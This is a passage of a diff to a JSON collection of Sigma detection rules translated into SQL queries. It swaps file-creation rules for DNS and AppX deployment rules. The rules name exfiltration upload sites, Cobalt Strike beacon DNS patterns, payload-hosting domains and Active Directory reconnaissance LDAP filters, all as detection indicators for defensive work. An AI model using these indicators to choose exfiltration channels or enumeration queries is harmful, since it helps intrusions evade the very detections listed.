LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", - "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", - "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ], - "falsepositives": [ - "Unknown" + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_ldap_recon.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "status": "experimental", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" - ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" - }, - { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", - "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", + "status": "experimental", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": 